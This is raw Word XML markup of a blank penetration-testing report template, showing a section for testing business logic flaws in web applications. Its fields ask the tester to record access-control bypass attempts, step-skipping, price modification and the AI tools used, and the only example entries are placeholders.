          <w:p w14:paraId="767D3E1B" w14:textId="77777777" w:rsidR="00F1568A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DC49190" w14:textId="77777777" w:rsidR="00F1568A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9110F9D" w14:textId="77777777" w:rsidR="00F1568A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E6B422D" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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7AAC484" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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42EE1D6" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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E90CCC1" w14:textId="77777777" w:rsidR="00F1568A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1568A" w:rsidRPr="00C73FBD" w14:paraId="4FA431D3" w14:textId="77777777" w:rsidTr="008E716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09F5FC24" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00357473" w:rsidRDefault="00F1568A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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD69BDD" w14:textId="77777777" w:rsidR="00F1568A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0263C43" w14:textId="77777777" w:rsidR="00F1568A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5E29B0D" w14:textId="77777777" w:rsidR="00F1568A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1630ADB" w14:textId="77777777" w:rsidR="00F1568A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1568A" w:rsidRPr="00C73FBD" w14:paraId="45801F0A" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69184351" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00A54B18" w:rsidRDefault="00F1568A" w:rsidP="008E7163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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62DB73A8" w14:textId="77777777" w:rsidR="00F1568A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7F0F031" w14:textId="77777777" w:rsidR="00F1568A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13B3A75" w14:textId="77777777" w:rsidR="00F1568A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83E45E4" w14:textId="77777777" w:rsidR="00F1568A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80BF5D2" w14:textId="77777777" w:rsidR="00F1568A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DE269C1" w14:textId="77777777" w:rsidR="00F1568A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20003AD" w14:textId="77777777" w:rsidR="00F1568A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AAF3D86" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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41E8C0A" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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599F9B7" w14:textId="77777777" w:rsidR="00F1568A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F0D8A50" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00972D9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0C68B208" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00C73FBD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC4F70C" w14:textId="14AF7FD4" w:rsidR="00951C02" w:rsidRDefault="00951C02" w:rsidP="00951C02">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00951C02">
        <w:lastRenderedPageBreak/>
        <w:t>Test 11: Test for Business Logic Flaws in Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74480209" w14:textId="47374EFB" w:rsidR="00E07742" w:rsidRPr="008A7361" w:rsidRDefault="00ED03F8" w:rsidP="00925905">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7361">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00B60BAF" w:rsidRPr="008A7361">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Cordia New"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="00925905">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Cordia New"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">includes techniques for </w:t>
      </w:r>
      <w:r w:rsidR="00344B73" w:rsidRPr="008A7361">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Cordia New"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>identifying flaws in the business rules, analyzing workflows, and attempting actions that violate logical constraints to reveal vulnerabilities that could lead to unauthorized access, financial abuse, or data manipulation.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E47F52" w14:textId="77777777" w:rsidR="00E64690" w:rsidRDefault="00E64690" w:rsidP="00F25963">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B15E14" w:rsidRPr="00A51A96" w14:paraId="618EB0C2" w14:textId="77777777" w:rsidTr="0070036C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5A21E658" w14:textId="648C2B24" w:rsidR="00B15E14" w:rsidRPr="003C713F" w:rsidRDefault="00B15E14" w:rsidP="005232C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11.1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7D303B" w:rsidRPr="007D303B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Logic Flaws</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20131BF5" w14:textId="77777777" w:rsidR="008A7361" w:rsidRPr="0070036C" w:rsidRDefault="008A7361" w:rsidP="008E517A">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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5"/>
        <w:gridCol w:w="2229"/>
        <w:gridCol w:w="6821"/>
        <w:gridCol w:w="185"/>
      </w:tblGrid>
      <w:tr w:rsidR="004240C3" w:rsidRPr="004240C3" w14:paraId="54DD6DE2" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E9A9AF2" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004C33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240C3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C36FEE5" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004240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240C3" w:rsidRPr="004240C3" w14:paraId="7DE1883D" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DCD5702" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004C33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240C3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98FD4BF" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004240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240C3" w:rsidRPr="004240C3" w14:paraId="490CEB69" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="503478BB" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004C33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240C3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8087F6B" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004240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240C3" w:rsidRPr="004240C3" w14:paraId="274490FC" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:trHeight w:val="1304"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FAFF630" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004C33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240C3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerable Code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C843726" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004240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337CC" w:rsidRPr="004240C3" w14:paraId="0D2FEF24" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:trHeight w:val="1871"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B2230B9" w14:textId="4C3D9B3F" w:rsidR="00F337CC" w:rsidRPr="004240C3" w:rsidRDefault="00F337CC" w:rsidP="004C33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337CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application Features &amp; Workflows Analyzed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9B418FF" w14:textId="7BD6F6C6" w:rsidR="00F337CC" w:rsidRPr="003E08D2" w:rsidRDefault="003E08D2" w:rsidP="004240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3E08D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[*Multi-step processes, Role-based access controls, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004240C3" w:rsidRPr="004240C3" w14:paraId="1785AC93" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C7AE7D8" w14:textId="6F433FCB" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="002906E2" w:rsidP="004C33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906E2"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 Critical Business Function</w:t>
            </w:r>
            <w:r w:rsidR="004240C3" w:rsidRPr="004240C3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>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8480E8F" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="009D00DD" w:rsidRDefault="002906E2" w:rsidP="002906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9D00D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9D00DD" w:rsidRPr="009D00D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Payment Processing, User Permissions, Authentication, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72653C4D" w14:textId="77777777" w:rsidR="009D00DD" w:rsidRDefault="009D00DD" w:rsidP="002906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986F693" w14:textId="77777777" w:rsidR="009D00DD" w:rsidRDefault="009D00DD" w:rsidP="002906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926FB5A" w14:textId="50794CB2" w:rsidR="009D00DD" w:rsidRPr="004240C3" w:rsidRDefault="009D00DD" w:rsidP="002906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3457D" w:rsidRPr="004240C3" w14:paraId="40CB482B" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="139E4440" w14:textId="2F88E20B" w:rsidR="0013457D" w:rsidRPr="002906E2" w:rsidRDefault="0013457D" w:rsidP="004C33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3457D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Concurrency Issues Detected?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F391B38" w14:textId="77777777" w:rsidR="0013457D" w:rsidRDefault="0013457D" w:rsidP="002906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5206B4" w:rsidRPr="005206B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 if found</w:t>
            </w:r>
            <w:r w:rsidR="005206B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A9977AF" w14:textId="77777777" w:rsidR="005206B4" w:rsidRDefault="005206B4" w:rsidP="002906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9AD1A00" w14:textId="2721C441" w:rsidR="005206B4" w:rsidRPr="009D00DD" w:rsidRDefault="005206B4" w:rsidP="002906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206B4" w:rsidRPr="004240C3" w14:paraId="138349D1" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C5C1C5A" w14:textId="0ADA1CC7" w:rsidR="005206B4" w:rsidRPr="0013457D" w:rsidRDefault="005206B4" w:rsidP="004C33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206B4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Access Control Bypass Attempted?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1C0F507" w14:textId="77777777" w:rsidR="005206B4" w:rsidRDefault="005206B4" w:rsidP="002906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5206B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Methods Used: URL Manipulation, API Tampering,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D7445E2" w14:textId="77777777" w:rsidR="005206B4" w:rsidRDefault="005206B4" w:rsidP="002906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4B87592" w14:textId="0EFE6B93" w:rsidR="005206B4" w:rsidRDefault="005206B4" w:rsidP="002906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206B4" w:rsidRPr="004240C3" w14:paraId="5B4160D1" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E133D16" w14:textId="7852DFE2" w:rsidR="005206B4" w:rsidRPr="005206B4" w:rsidRDefault="00A52C80" w:rsidP="004C33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2C80">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sequence Manipulation Attempts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5EB41F5" w14:textId="77777777" w:rsidR="005206B4" w:rsidRDefault="00A52C80" w:rsidP="002906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A52C8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Checkout Skipping, Step Reordering,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717191F" w14:textId="77777777" w:rsidR="00A52C80" w:rsidRDefault="00A52C80" w:rsidP="002906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31B5965" w14:textId="4CCD972A" w:rsidR="00A52C80" w:rsidRDefault="00A52C80" w:rsidP="002906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A52C80" w:rsidRPr="004240C3" w14:paraId="2FDA8909" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D818625" w14:textId="26089FAF" w:rsidR="00A52C80" w:rsidRPr="00A52C80" w:rsidRDefault="00A52C80" w:rsidP="004C33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2C80">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session &amp; State Manipulation Tested?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D040FAF" w14:textId="7F262F51" w:rsidR="00A52C80" w:rsidRDefault="00A52C80" w:rsidP="002906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670D6A" w:rsidRPr="00670D6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Hidden Fields, Session Variables, etc.</w:t>
            </w:r>
            <w:r w:rsidR="00670D6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670D6A" w:rsidRPr="004240C3" w14:paraId="258A71B5" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BAC949B" w14:textId="6B00B023" w:rsidR="00670D6A" w:rsidRPr="00A52C80" w:rsidRDefault="005A4F5C" w:rsidP="004C33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A4F5C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Price Modification or Unauthorized Transactions Tested?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6CDF05A" w14:textId="5FD4832B" w:rsidR="00670D6A" w:rsidRDefault="005A4F5C" w:rsidP="002906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5A4F5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Observations if found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5A4F5C" w:rsidRPr="004240C3" w14:paraId="02093F7B" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="184E0EE0" w14:textId="0EADCEF9" w:rsidR="005A4F5C" w:rsidRPr="005A4F5C" w:rsidRDefault="00544FAB" w:rsidP="004C33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44FAB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Code Review Observations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ED6610B" w14:textId="77777777" w:rsidR="005A4F5C" w:rsidRDefault="00544FAB" w:rsidP="002906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544FA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Conditional Branching Errors, Weak Role Validation,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BE1ECF9" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="002906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59D63C5" w14:textId="15FE8B12" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="002906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44FAB" w:rsidRPr="004240C3" w14:paraId="628576D4" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FFFFA4" w14:textId="06ED51FE" w:rsidR="00544FAB" w:rsidRPr="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="004C33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44FAB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Other Vulnerabilities Identified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6F94698" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="002906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6D7AE7D" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="002906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FFEF18D" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="002906E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4240C3" w:rsidRPr="004240C3" w14:paraId="0B2C8A12" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E3A470F" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004C33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240C3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CC50B7A" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="192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E561911" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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80C8188" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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2D22EDF" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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45D1382" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="001E2AE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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1C20453" w14:textId="77777777" w:rsidR="004240C3" w:rsidRPr="004240C3" w:rsidRDefault="004240C3" w:rsidP="004240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44FAB" w:rsidRPr="004240C3" w14:paraId="4806EF44" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22C84FAA" w14:textId="3F02FA99" w:rsidR="00544FAB" w:rsidRPr="004240C3" w:rsidRDefault="00544FAB" w:rsidP="004C33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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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054948C" w14:textId="7E249B34" w:rsidR="00544FAB" w:rsidRPr="0004313F" w:rsidRDefault="00544FAB" w:rsidP="00544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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="0089347C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="0004313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D3BE4F" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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33AC225" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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F01D9CD" w14:textId="77777777" w:rsidR="004C330F" w:rsidRDefault="004C330F" w:rsidP="00544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9A4F2E3" w14:textId="77777777" w:rsidR="004C330F" w:rsidRPr="004240C3" w:rsidRDefault="004C330F" w:rsidP="00544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44FAB" w:rsidRPr="004240C3" w14:paraId="6F822152" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22129EA6" w14:textId="6E454989" w:rsidR="00544FAB" w:rsidRPr="00357473" w:rsidRDefault="00544FAB" w:rsidP="004C33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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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3230B9F" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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281C089" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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6C3FF4A" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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F5D0B2A" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRPr="0004313F" w:rsidRDefault="00544FAB" w:rsidP="00544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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00544FAB" w:rsidRPr="004240C3" w14:paraId="76B1EF46" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F5046C8" w14:textId="233549BE" w:rsidR="00544FAB" w:rsidRPr="00357473" w:rsidRDefault="00544FAB" w:rsidP="004C33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E5AB47F" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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8CB4801" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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995F5FF" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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5B8340F" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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544FAB" w:rsidRPr="004240C3" w14:paraId="3E9A41E8" w14:textId="77777777" w:rsidTr="00265938">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76A6BCC2" w14:textId="3EDF2DC9" w:rsidR="00544FAB" w:rsidRPr="00A54B18" w:rsidRDefault="00544FAB" w:rsidP="004C330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Results Analysis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A36D71D" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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4E74C54" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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867EF5C" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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65662C9" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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18B3D38" w14:textId="77777777" w:rsidR="00544FAB" w:rsidRDefault="00544FAB" w:rsidP="00544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5A463EC" w14:textId="77777777" w:rsidR="004C330F" w:rsidRDefault="004C330F" w:rsidP="00544FA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25963" w:rsidRPr="00A51A96" w14:paraId="07F16766" w14:textId="77777777" w:rsidTr="00265938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E8E8E8" w:themeFill="background2"/>
        </w:tblPrEx>
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:gridAfter w:val="1"/>
          <w:wBefore w:w="125" w:type="dxa"/>
          <w:wAfter w:w="185" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="17A74AE8" w14:textId="49EBBA7D" w:rsidR="00F25963" w:rsidRPr="003C713F" w:rsidRDefault="00F25963" w:rsidP="005232C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11.2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BD0AC7" w:rsidRPr="00BD0AC7">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Multistage Processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
